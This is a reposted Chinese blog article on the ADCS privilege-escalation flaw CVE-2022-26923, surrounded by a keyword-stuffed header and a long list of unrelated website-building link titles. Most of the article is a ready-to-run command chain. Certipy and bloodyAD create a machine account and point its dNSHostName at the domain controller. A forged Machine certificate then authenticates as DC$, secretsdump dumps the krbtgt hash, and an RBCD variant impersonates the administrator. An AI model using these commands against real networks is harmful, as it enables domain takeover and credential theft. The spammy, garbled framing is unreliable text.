当前位置: 首页 > news >正文

网站建设的布局妞妞的个人网页制作

网站建设的布局,妞妞的个人网页制作,石家庄商城网站制作,有网站前台CSDN自动博客文章迁移漏洞简介该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。漏洞利用添加机器账户#xff0c;并将该机器账户dnsHostName指向DC[…CSDN自动博客文章迁移漏洞简介该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。漏洞利用添加机器账户并将该机器账户dnsHostName指向DC[MAQ默认为10]:certipy account create -u zhangattack.cn -p 321.com -dc-ip 192.168.11.11 -user hacker -pass win123456 -dns dc.attack.cn用该机器账户向ADCS请求证书# TARGET为ADCS机器IPcertipy req -u hacker$attack.cn -p win123456 -target 192.168.11.12 -ca ATTACK-ADCS-CA -template Machine用申请的证书请求DC$的TGT:certipy auth -pfx dc.pfx -dc-ip 192.168.11.11用DC$的nthash去DCSync:secretsdump.py attack.cn/dc$192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e使用bloodyAD 攻击# 查询MAQ的属性python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes DCattack,DCcn ms-DS-MachineAccountQuota​python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes DCattack,DCcn ms-DS-MachineAccountQuota​# 新增计算机账号 python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 addComputer creme pass123​# 设置新增的机器账号的属性DNSHostName指向AD的属性值python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 setAttribute CNcremem,CNComputers,DCattack,DCcn dNSHostName [dc.attack.cn]​# 查看dNSHostName属性的指向​python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes DCattack,DCcn dNSHostName​# 运行Certipy生成机器证书可以看到DNSHostName 已经变成了dc.attack.cncertipy req attack.cn/cremem$:pass123dc.attack.cn -ca ATTACK-ADCS-CA -template Machine​# 用申请的证书请求DC$的TGTcertipy auth -pfx dc.pfx -dc-ip 192.168.11.11​# 用DC$的nthash去DCSyncsecretsdump.py attack.cn/dc$192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e​如果使用certipy请求TGT失败还可以设置RBCD来攻击openssl pkcs12 -in dc.pfx -out dc.pem -nodespython3 bloodyAD.py -c :dc.pem -u win$ --host 192.168.11.11 setRbcd hacker$ dc$getST.py attack.cn/hacker$:win123456 -spn LDAP/dc.attack.cn -impersonate administrator -dc-ip 192.168.11.11export KRB5CCNAMEadministrator.ccachesecretsdump.py -k dc.attack.cn -just-dc-user attack/krbtgt​转载请注明Adminxes Blog » ADCS攻击之CVE-2022–26923
http://www.dnsts.com.cn/news/59615.html

相关文章:

  • 网站收录排名怎么做wordpress 重写规则
  • 昆明网站建设系统有哪些vi设计案例赏析
  • 沈阳网站建设优化app软件开发平台游戏
  • 一般做网站上传的图片大小凡客的网站功能
  • 郑州建站优化2017建设厅网站
  • 怎么在网站上做宣传做网站迅雷下载链接设置
  • 如何让百度k掉网站网站编辑难做吗
  • 数码网站建设论文数据库与网站
  • html商业网站模板做网站有意思吗?
  • 肃州区住房和城乡建设局网站阿里云租的域名怎么做网站
  • ppt电子商务网站建设asp网站如何实现伪静态
  • 有什么网站可以赚钱护栏板官方网站建设
  • 免费推广网站地址大全网站手机版怎么弄
  • 行业门户网站营销案例后台管理系统界面
  • 网站建设 代表联系群众白云区网站建设
  • 楚雄市住房和城乡建设局门户网站我的世界图片制作器
  • 基于PHP网站开发的管理系统设计与开发建设局网站功能简介
  • 做网站要用到的技术wordpress 取消边栏
  • 公司网站建设的签订合同wordpress黑页
  • 洛阳建设工程信息网10个网站用户体验优化的研究结果
  • 网站制作商城如何建设网站网站
  • 邢台制作网站云南app开发
  • 学校网站建设与管理办法网站搜索框用ps怎么做
  • 电子商务网站建设的目标网站开发专业感想
  • 携程的网站建设网站建立连接不安全怎么解决
  • 做网站什么好网站排名优化首页
  • 福州交通建设投资集团网站网站建设工作会议讲话
  • 六安市网站建设百度网站排名规则
  • 怎么做全民夺宝网站门户网站系统介绍
  • 龙华三网合一网站建设微网站开发微网站建设